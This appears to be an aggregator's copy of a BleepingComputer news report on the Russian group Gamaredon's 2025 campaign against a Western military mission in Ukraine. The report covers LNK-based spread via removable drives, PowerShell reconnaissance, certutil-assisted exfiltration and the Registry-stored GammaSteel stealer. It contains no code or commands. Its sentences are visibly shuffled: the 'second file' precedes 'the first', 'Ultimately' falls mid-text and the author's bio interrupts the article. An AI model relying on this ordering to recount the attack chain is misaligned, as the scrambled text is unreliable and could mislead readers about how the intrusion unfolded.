The Russian state-backed hacking group Gamaredon (aka “Shuckworm”) has been targeting a military mission of a Western country in Ukraine in attacks likely deployed from removable drives. Symantec threat researchers say the campaign started in February 2025 and continued until March, with hackers deploying an updated version of the GammaSteel info-stealing malware to exfiltrate data. The second file handles the spreading mechanism to infect other removable and network drives using LNK files, while also hiding certain folders and system files to hide the compromise. Next, Gamaredon used a reconnaissance PowerShell script that can capture and exfiltrate screenshots of the infected device and gather information about installed antivirus tools, files, and running processes. Symantec comments that various incremental but meaningful improvements in the threat group’s TTPs (tactics, techniques, and procedures) elevate the risks it poses to Western networks, especially considering Gamaredon’s unwavering tenacity. Bill Toulas Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks. According to the report, initial access to the infected systems was probably achieved via removable drives containing malicious .LNK files, a vector that Gamaredon has used in the past. The recent Gamaredon campaign reflects an effort to increase operational stealth and effectiveness despite the threat group’s limited sophistication compared to other Russian state actors. The researchers note a change in the threat actor's tactics, including a shift from VBS scripts to PowerShell-based tools, more obfuscation for payloads, and increased use of legitimate services for evasion. Ultimately, the malware uses ‘certutil.exe’ to hash the files and exfiltrates them using PowerShell web requests. The first handles command and control (C2) communications, resolving the server address using legitimate services, and connecting to Cloudflare-protected URLs. The malware can steal documents (.DOC, .PDF, .XLS, .TXT) from various locations like Desktop, Documents, and Downloads, confirming Gamaredon’s continuing interest in espionage. The final payload used in the observed attacks is a PowerShell-based version of GammaSteel that is stored in Windows Registry.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Thu, 10 Apr 2025 14:25:18 +0000